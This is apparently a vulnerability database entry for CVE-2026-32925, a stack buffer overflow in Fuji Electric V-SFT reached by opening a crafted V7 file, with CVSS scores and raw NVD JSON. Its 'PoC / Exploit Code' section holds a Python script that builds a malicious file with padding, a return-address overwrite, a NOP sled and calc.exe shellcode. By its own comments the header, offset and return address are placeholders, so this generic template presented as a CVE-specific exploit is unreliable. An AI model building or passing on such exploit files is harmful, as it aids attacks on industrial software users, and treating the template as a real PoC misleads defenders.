Security Vulnerability Report
中文
CVE-2026-32925 CVSS 7.8 HIGH

CVE-2026-32925

Published: 2026-04-01 23:17:03
Last Modified: 2026-04-07 18:27:01

Description

V-SFT versions 6.2.10.0 and prior contain a stack-based buffer overflow in VS6ComFile!CV7BaseMap::WriteV7DataToRom. Opening a crafted V7 file may lead to arbitrary code execution on the affected product.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fujielectric:v-sft:*:*:*:*:*:*:*:* - VULNERABLE
V-SFT <= 6.2.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-32925 V-SFT Stack-Based Buffer Overflow # This script generates a crafted V7 file that triggers the overflow. import struct def create_malicious_v7(filename): # V7 file header placeholder (structure may vary based on actual spec) header = b"V7_FILE_HEADER" + b"\x00" * 20 # The overflow trigger: a large string to overwrite the stack # Offset to return address needs to be determined by debugging # Assuming an offset of 500 bytes for demonstration offset = 500 # Padding (A's) padding = b"A" * offset # Fake return address (e.g., address of JMP ESP or controlled buffer) # This is a placeholder address ret_addr = struct.pack("<L", 0xdeadbeef) # Optional: NOP sled + Shellcode nop_sled = b"\x90" * 100 # Simple calc.exe shellcode (x86) for demonstration shellcode = b"\x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0" payload = header + padding + ret_addr + nop_sled + shellcode with open(filename, "wb") as f: f.write(payload) print(f"[+] Malicious V7 file created: {filename}") print(f"[+] Payload size: {len(payload)} bytes") if __name__ == "__main__": create_malicious_v7("exploit_CVE-2026-32925.v7")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32925", "sourceIdentifier": "[email protected]", "published": "2026-04-01T23:17:02.783", "lastModified": "2026-04-07T18:27:01.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "V-SFT versions 6.2.10.0 and prior contain a stack-based buffer overflow in VS6ComFile!CV7BaseMap::WriteV7DataToRom. Opening a crafted V7 file may lead to arbitrary code execution on the affected product."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fujielectric:v-sft:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.2.10.0", "matchCriteriaId": "36E67AE4-958D-4DA7-B5E2-95A3BDD29BF6"}]}]}], "references": [{"url": "https://felib.fujielectric.co.jp/en/M10010/M20060/document_detail/5d9dd71d-9494-41a4-aa5c-8e6b8b21066b?region=en-glb", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://jvn.jp/en/vu/JVNVU90448293/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}